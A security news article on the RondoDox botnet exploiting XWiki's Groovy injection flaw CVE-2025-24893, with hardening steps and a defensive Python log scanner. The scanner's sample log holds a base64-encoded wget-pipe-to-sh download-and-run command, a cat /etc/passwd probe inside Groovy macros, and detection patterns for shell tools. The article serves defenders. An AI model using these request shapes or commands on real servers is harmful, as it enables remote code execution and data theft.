RondoDox Botnet Exploits Critical XWiki CVE-2025-24893 RCE Vulnerability

CyberSecureFox 🦊

A critical remote code execution (RCE) vulnerability CVE-2025-24893 in XWiki Platform is being actively exploited by the emerging RondoDox botnet, with attack traffic growing sharply since early November. The flaw has already been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, which typically signals widespread exploitation in the wild and elevates the urgency for patching in enterprise environments.

RondoDox botnet: rapidly maturing threat targeting internet-exposed systems

The RondoDox botnet was first documented by researchers in mid‑2025 and is attributed to a relatively new threat actor focused on compromising large volumes of internet‑facing devices. According to Fortinet and other vendors, the operators aim to build a distributed infrastructure for monetization and further attacks.

Recent samples analyzed by Trend Micro indicate that RondoDox targets a wide spectrum of devices, including digital and network video recorders (DVR/NVR), IP surveillance systems, and web servers. The botnet leverages dozens of publicly known vulnerabilities, some of which were originally demonstrated at Pwn2Own competitions, where practical exploit chains for popular products are routinely disclosed.

CVE-2025-24893: critical RCE in open-source XWiki collaboration platform

XWiki is a widely used open-source enterprise wiki platform adopted by organizations as a central knowledge base and documentation system. Because it is often deeply integrated into business workflows and internal authentication systems, compromise of XWiki can provide attackers with a convenient pivot point into corporate networks.

The vulnerability CVE-2025-24893 affects XWiki versions prior to 15.10.11 and 16.4.1. It enables a remote, unauthenticated attacker to execute arbitrary code on the server hosting XWiki. In many deployments, the application runs under a dedicated service account; however, misconfigurations or broad privileges can allow attackers to escalate access and gain a high level of control over the underlying host.

Groovy injection via SolrSearch endpoint

Analysis by VulnCheck shows that since 3 November 2025, RondoDox operators have been sending crafted HTTP GET requests to vulnerable XWiki instances. The attacks focus on the SolrSearch endpoint, which supports execution of Groovy code as part of the search functionality.

The malicious requests embed a base64‑encoded Groovy script. Once decoded and executed on the server, this script retrieves a remote shell script that deploys the main RondoDox payload. As a result, the compromised XWiki server is silently enrolled into the botnet and starts communicating with attacker‑controlled command‑and‑control (C2) infrastructure.

Cryptominers and reverse shells on compromised XWiki servers

Beyond botnet enrollment, researchers observe that attackers frequently install cryptocurrency miners on infected systems. This leads to sustained high CPU utilization, degraded performance of business applications, and in some cases service instability or outages, especially on resource‑constrained servers.

In multiple incidents, the operators also attempt to establish a reverse shell—an interactive remote access channel from the server back to the attacker. Such access enables manual command execution, lateral movement across the internal network, data exfiltration, and long‑term persistence even if some malware components are later detected and removed.

Mass scanning for XWiki Groovy injection beyond RondoDox

VulnCheck and other monitoring projects report wide‑scale internet scanning of XWiki installations, not limited to the RondoDox infrastructure. Attackers are leveraging automated tools, including the Nuclei framework, to run templates for Groovy injection and to test simple commands like cat /etc/passwd in order to confirm successful code execution.

At the same time, researchers are detecting Out‑Of‑Band Application Security Testing (OAST) techniques, where exploit success is verified through external interactions such as DNS or HTTP callbacks to attacker‑controlled domains. Such patterns are typical of offensive security scanners, penetration testers, and multiple threat groups, suggesting that CVE-2025-24893 has quickly become part of the standard exploit toolkit.

Organizational risk and practical XWiki hardening measures

The combination of a critical RCE vulnerability in XWiki, automated exploitation by RondoDox, and broad community interest in weaponizing the bug creates several concrete risks: unauthorized access to internal documentation and credentials, abuse of corporate infrastructure for spam, DDoS and cryptomining, and potential staging of further intrusions.

Administrators of XWiki deployments should prioritize the following actions:

1. Patch XWiki immediately. Upgrade to 15.10.11 or 16.4.1 (or newer) where CVE-2025-24893 is remediated. Vulnerability exploitation timelines observed across many incidents show that public proof‑of‑concepts are often operationalized by threat actors within days.

2. Reduce internet exposure. Review whether XWiki must be publicly reachable. Where possible, restrict access using VPN, Single Sign‑On (SSO), network ACLs, and allow‑listed IP ranges. Minimizing attack surface significantly lowers the probability of opportunistic compromise.

3. Deploy WAF or reverse proxy protections. Place a Web Application Firewall (WAF) or reverse proxy in front of XWiki to block suspicious requests targeting SolrSearch and patterns of Groovy injection, base64‑encoded payloads, and command‑execution probes.

4. Conduct log and performance analysis. Examine HTTP access logs for anomalous GET requests to search endpoints, Groovy execution errors, and unexpected spikes in CPU load that may indicate cryptominer deployment or scanning.

5. Monitor outbound traffic. Implement network monitoring and egress controls to detect unusual outbound connections to unknown hosts or dynamic DNS domains, which often signal C2 traffic or miner‑pool communication.
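The log-analysis step above (item 4) can be turned into a first-pass triage script. The following Python is an added example written for this page; it is not code from the article, from VulnCheck, or from the XWiki project. It parses common/combined-format access-log lines and flags GET requests that combine the indicators the article describes: the SolrSearch endpoint, Groovy injection, long base64 runs that decode to a downloader-style text payload, and command-execution probes such as cat /etc/passwd. Assumptions are labelled in the code: the full endpoint path under /xwiki/bin/get/ is assumed (the match keys only on the "SolrSearch" substring), XWiki's {{groovy}} macro syntax is assumed to be the injection marker, and the sample log lines are constructed, with a deliberately non-functional run(...) placeholder standing in for whatever the injected script did.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Common/combined access-log format as written by nginx or Apache by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoint name from the article; the exact path varies per install, so match the substring.
SEARCH_ENDPOINT = "solrsearch"
# Assumption: XWiki's Groovy macro syntax ({{groovy}} ... {{/groovy}}) marks an injection attempt;
# a bare "groovy" search term is only a weak signal (someone may simply search the wiki for it).
GROOVY_MACRO_RE = re.compile(r"\{\{\s*/?\s*groovy\b", re.IGNORECASE)
GROOVY_WORD_RE = re.compile(r"groovy", re.IGNORECASE)
# Long base64 runs, the encoding the article reports for the smuggled script.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Decoded content that looks like a download-and-run stage.
SHELL_LIKE_RE = re.compile(r"\b(?:wget|curl|sh|bash)\b|https?://", re.IGNORECASE)
# Command-execution probe mentioned in the article.
PROBE_RE = re.compile(r"/etc/passwd")
STRONG = {"groovy_macro", "command_probe", "base64_shell_like"}


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_base64_blobs(text):
    """Decode every long base64 run; keep only blobs that decode to printable ASCII text."""
    decoded_blobs = []
    for blob in B64_RE.findall(text):
        padded = blob + "=" * (-len(blob) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            continue
        if not raw.isascii():          # URL path segments also match B64_RE; drop binary junk
            continue
        out = raw.decode("ascii")
        printable = sum(c.isprintable() or c in "\n\t" for c in out)
        if printable / len(out) > 0.9:
            decoded_blobs.append(out)
    return decoded_blobs


def score_request(entry):
    """Return (severity, indicators, decoded_payloads) for one parsed entry; severity None = not flagged."""
    parts = urlsplit(entry["target"])
    path = unquote(parts.path)
    values = [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    haystack = " ".join([path] + values)
    indicators = []
    if SEARCH_ENDPOINT in path.lower():
        indicators.append("solrsearch_endpoint")
    if GROOVY_MACRO_RE.search(haystack):
        indicators.append("groovy_macro")
    elif "solrsearch_endpoint" in indicators and GROOVY_WORD_RE.search(haystack):
        indicators.append("groovy_keyword")
    if PROBE_RE.search(haystack):
        indicators.append("command_probe")
    decoded = decode_base64_blobs(haystack)
    if decoded:
        indicators.append("base64_text_payload")
        if any(SHELL_LIKE_RE.search(d) for d in decoded):
            indicators.append("base64_shell_like")
    # Hitting the search endpoint alone is normal traffic; only extra signals raise severity.
    signals = [i for i in indicators if i != "solrsearch_endpoint"]
    severity = "high" if STRONG & set(signals) else ("medium" if signals else None)
    return severity, indicators, decoded


def scan_log(lines):
    """Return the flagged entries, in log order, with severity, indicators and decoded payloads."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue
        severity, indicators, decoded = score_request(entry)
        if severity:
            hits.append({"severity": severity, "ip": entry["ip"], "target": entry["target"],
                         "indicators": indicators, "decoded": decoded})
    return hits


# Constructed sample data (not real traffic). example.invalid is a reserved non-resolving domain.
SAMPLE_B64 = base64.b64encode(b"wget -qO- http://example.invalid/r.sh | sh").decode()
_q = lambda s: quote(s, safe="")  # percent-encode like a client so '+' and '/' in base64 survive parse_qsl
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Nov/2025:10:12:01 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 5120',
    '10.0.0.7 - - [03/Nov/2025:10:13:44 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=onboarding HTTP/1.1" 200 2048',
    '203.0.113.9 - - [03/Nov/2025:10:15:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text='
    + _q('{{groovy}}run("' + SAMPLE_B64 + '"){{/groovy}}') + ' HTTP/1.1" 200 1337',
    '198.51.100.4 - - [03/Nov/2025:10:16:30 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text='
    + _q('{{groovy}}run("cat /etc/passwd"){{/groovy}}') + ' HTTP/1.1" 200 990',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["severity"], hit["ip"], hit["indicators"], hit["decoded"])
```

Run against a real log with `scan_log(open("access.log"))`. The script decodes the query string before matching, so percent-encoded or base64-wrapped payloads are not missed, and it deliberately does not flag plain SolrSearch queries on their own, which keeps ordinary wiki searches out of the review queue.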

Maintaining an up‑to‑date inventory of all internet‑exposed services, tracking high‑priority entries in the CISA KEV catalog, running internal scans with tools such as Nuclei, and regularly backing up XWiki data with tested restore procedures are essential defensive practices. The exploitation of CVE-2025-24893 by RondoDox demonstrates that corporate wiki platforms are part of critical infrastructure, not ancillary systems. Organizations that move quickly to patch, harden access, and continuously monitor their XWiki environments will substantially reduce the likelihood of compromise and prevent their resources from being absorbed into criminal botnet ecosystems.
